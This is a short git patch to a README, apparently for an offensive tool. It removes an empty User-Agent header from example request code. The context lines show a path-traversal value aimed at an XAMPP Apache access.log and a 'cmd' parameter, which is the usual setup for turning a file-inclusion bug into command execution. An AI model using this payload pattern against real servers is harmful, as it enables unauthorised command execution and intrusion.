From 9337eb3b932f6d8fab0cdb261c4e09c3d7151f99 Mon Sep 17 00:00:00 2001 From: n3rada <72791564+n3rada@users.noreply.github.com> Date: Wed, 28 Feb 2024 00:29:57 +0100 Subject: [PATCH] Update README.md --- README.md | 3 --- 1 file changed, 3 deletions(-) diff --git a/README.md b/README.md index a7a057a..81f2211 100644 --- a/README.md +++ b/README.md @@ -60,9 +60,6 @@ def execute(command: str, timeout: float = None) -> str: "page": r"\..\..\..\..\..\..\..\..\..\..\\xampp\apache\logs\access.log", "cmd": command, }, - headers={ - "User-Agent": "" - }, # ||BURP|| timeout=timeout, verify=False,